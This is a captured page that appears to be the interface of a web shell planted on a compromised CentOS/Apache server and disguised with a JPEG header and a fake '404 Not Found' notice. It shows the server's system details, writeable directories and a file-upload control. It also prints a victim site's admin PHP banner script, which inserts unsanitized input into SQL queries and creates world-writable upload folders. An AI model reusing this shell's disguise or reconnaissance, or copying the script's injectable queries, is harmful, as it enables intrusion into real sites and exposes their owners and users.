ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/netphim/code/admin/banner/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/netphim/code/admin/banner/post.php
<?php
$banner_id = (isset($CORE->input['banner_id']) && $CORE->input['banner_id']>0) ? $CORE->input['banner_id'] : 0 ;
if($banner_id==0){
    $row_check = $DB->get_colum_tb('tb_banner');
}else{
    $row_check = $DB->fetch_row($DB->query("SELECT * FROM tb_banner WHERE banner_id='$banner_id' "));
}
if(isset($CORE->input['submitbt'])){
    $f = $CORE->input['f'];
    if(intval($f['banner_id'])==0){
        $arr_insert = array('banner_title'=>trim($f['banner_title']),'banner_url'=>trim($f['banner_url']),'banner_target'=>$f['banner_target'],'banner_pos'=>$f['banner_pos'],'banner_time'=>date('Y-m-d H:i:s'));
        $banner_id = $DB->do_insert('tb_banner',$arr_insert);
        if($arr_option['show_en']=='yes'){
            $DB->query("UPDATE tb_banner SET banner_etitle='".trim($f['banner_etitle'])."' WHERE banner_id='$banner_id' ");
        }
    }else{
        $banner_id = intval($f['banner_id']);
        $DB->query("UPDATE tb_banner SET banner_title='".trim($f['banner_title'])."',banner_url='".trim($f['banner_url'])."',banner_target='".$f['banner_target']."',banner_pos='".$f['banner_pos']."' WHERE banner_id='$banner_id' ");
        if($arr_option['show_en']=='yes'){
            $DB->query("UPDATE tb_banner SET banner_etitle='".trim($f['banner_etitle'])."' WHERE banner_id='$banner_id' ");
        }
    }
    include 'lib/class.upload.php';
    if($_FILES['image_field']){
        $handle = new upload($_FILES['image_field']);
        if ($handle->uploaded) {
            $v_image_name = 'banner_'.time().'_'.uniqid();
            $handle->allowed = array('image/*');
            $handle->file_new_name_body  = $v_image_name;
            $handle->file_max_size = '1000000';
            $handle->image_convert = 'png';

            $year_now = date('Y');
            $month_now = date('m');
            if(!is_dir("upload/logos")){
                mkdir("upload/logos", 0777);
            }
            if (is_dir("upload/logos/" . $year_now)) {
                if (!is_dir("upload/logos/" . $year_now . "/" . $month_now)) {
                    mkdir("upload/logos/" . $year_now . "/" . $month_now, 0777);
                }
            } else {
                mkdir("upload/logos/" . $year_now, 0777);
                if (!is_dir("upload/logos/" . $year_now . "/" . $month_now)) {
                    mkdir("upload/logos/" . $year_now . "/" . $month_now, 0777);
                }
            }
            $v_folder = $year_now . "/" . $month_now;
            $handle->process(ROOT_PATH.'upload/logos/'.$v_folder.'/');
            $v_image_folder = $v_folder.'/'.$v_image_name.'.png';
            if ($handle->processed) {
                if(intval($f['banner_id'])>0){
                    $row_check = $DB->fetch_row($DB->query("SELECT * FROM tb_banner WHERE banner_id='".intval($f['banner_id'])."' "));
                    if(isset($arr_option['banner_img']) and $arr_option['banner_img']!='') {
                        @unlink(ROOT_PATH . 'upload/logos/'.$arr_option['banner_img']);
                    }
                }
                $DB->query("UPDATE tb_banner SET banner_img='".$v_image_folder."' WHERE banner_id='".$banner_id."' ");
                $handle->clean();
            } else {
                $handle->clean();
                $print->refresh('?act=admin&code=banner&type=list','!Upload Error: '.$handle->error,5);
            }
        }
    }
    $print->refresh('?act=admin&code=banner&type=list');
}
?>

ZeroDay Forums Mini